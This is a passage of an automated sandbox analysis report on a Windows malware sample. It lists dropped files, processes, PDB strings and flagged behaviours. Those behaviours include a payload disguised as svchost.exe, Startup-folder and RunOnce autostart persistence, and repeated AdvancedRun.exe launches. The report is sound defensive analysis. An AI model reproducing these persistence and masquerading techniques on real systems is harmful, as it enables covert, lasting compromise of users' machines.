                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /SpecialRun 4101d8 2540
                      Source: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /SpecialRun 4101d8 3712
                      Source: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /SpecialRun 4101d8 5616
                      Source: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /SpecialRun 4101d8 2028
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,7_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 11_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,11_2_00408FC9
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,7_2_004095FD
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:1488:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6396
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:7152:120:WilError_01
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: Local\SM0:6640:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:4488:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:6344:120:WilError_01
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:3676:120:WilError_01
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: Local\SM0:6432:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6348:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:5936:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:3532:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:2812:120:WilError_01
                      Source: lKJbVguaav.exe, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: 7ADA33B7.exe.0.dr, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: svchost.exe.0.dr, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.0.lKJbVguaav.exe.cb0000.1.unpack, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.0.lKJbVguaav.exe.cb0000.0.unpack, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.7ADA33B7.exe.f80000.0.unpack, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: 32.0.7ADA33B7.exe.850000.0.unpack, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: 34.0.lKJbVguaav.exe.680000.0.unpack, RegExTester/u0035AF3DEF2.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: lKJbVguaav.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeDirectory created: C:\Program Files\Common Files\System\E59A6148Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeDirectory created: C:\Program Files\Common Files\System\E59A6148\svchost.exeJump to behavior
                      Source: lKJbVguaav.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: lKJbVguaav.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbF source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: Accessibility.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.Diagnostics.FastSerialization.pdb8 source: lKJbVguaav.exe, 00000000.00000000.363478855.000000000146E000.00000004.00000020.sdmp
                      Source: Binary string: symbols\exe\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: lKJbVguaav.exe, 00000000.00000000.363478855.000000000146E000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: lKJbVguaav.PDB@ source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: D:\Windows\Cursors\SuperServidorNet\_private_cry\rpe-bitrat\JabrezRPE\JabrezRPE\obj\x86\Debug\RunPE_MemoryProtection.pdb source: lKJbVguaav.exe, 00000000.00000000.415536274.0000000004297000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.363478855.000000000146E000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.363430987.000000000143F000.00000004.00000020.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Diagnostics.FastSerialization.pdbpdbion.pdb7 source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: ipC:\Windows\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002B.00000002.440495695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.445188545.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000000.435782596.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000002.439972142.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000000.439981519.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.454809675.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000033.00000002.448405509.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000034.00000000.450460932.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.37.dr
                      Source: Binary string: System.Xml.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: iC:\Users\user\Desktop\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\747\s\src\FastSerialization\obj\Release\net45\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe
                      Source: Binary string: C:\Users\user\Desktop\lKJbVguaav.PDB source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Diagnostics.FastSerialization.pdb source: lKJbVguaav.exe, 00000000.00000000.426583750.00000000067DD000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.426370254.00000000067C0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: E:\A\_work\747\s\src\FastSerialization\obj\Release\net45\Microsoft.Diagnostics.FastSerialization.pdbv.PDB source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: RunPE_MemoryProtection.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Core.pdbH source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Xml.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: lKJbVguaav.exe, 00000000.00000000.363430987.000000000143F000.00000004.00000020.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb@ source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb) source: lKJbVguaav.exe, 00000000.00000000.426370254.00000000067C0000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: E:\A\_work\747\s\src\FastSerialization\obj\Release\net45\Microsoft.Diagnostics.FastSerialization.pdbic.pdbE3931}\InprocServer32 source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: System.Drawing.pdbr source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Windows.Forms.pdbh source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp, WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: lKJbVguaav.exe, 00000000.00000000.365858462.00000000014A9000.00000004.00000020.sdmp
                      Source: Binary string: System.Drawing.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Management.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Core.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: c.pdbis_ source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: Microsoft.Diagnostics.FastSerialization.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.Xml.pdbD source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: .pdb source: lKJbVguaav.exe, 00000000.00000000.362947681.0000000001138000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WERF3FB.tmp.dmp.38.dr
                      Source: Binary string: System.ni.pdb source: WERF3FB.tmp.dmp.38.dr
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret 7_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret 7_2_0040B51D
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 11_2_0040B550 push eax; ret 11_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 11_2_0040B550 push eax; ret 11_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 11_2_0040B50D push ecx; ret 11_2_0040B51D
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0040289F
                      Source: lKJbVguaav.exeStatic PE information: 0xCA7188B4 [Tue Aug 17 15:03:16 2077 UTC]
                      Source: svchost.exe.0.drStatic PE information: real checksum: 0xe06cf should be: 0xd1df1
                      Source: 7ADA33B7.exe.0.drStatic PE information: real checksum: 0xe06cf should be: 0xd1df1
                      Source: lKJbVguaav.exeStatic PE information: real checksum: 0xe06cf should be: 0xd1df1

                      Persistence and Installation Behavior:

                      barindex
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Program Files\Common Files\system\E59A6148\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeJump to dropped file
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exeJump to dropped file
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeFile created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeFile created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeJump to dropped file
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Program Files\Common Files\system\E59A6148\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the startup folderShow sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeJump to dropped file
                      Creates autostart registry keys with suspicious namesShow sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 7ADA33B7Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe\:Zone.Identifier:$DATAJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 7ADA33B7Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 7ADA33B7Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 7ADA33B7Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 7ADA33B7Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_00401306
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00408E31
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
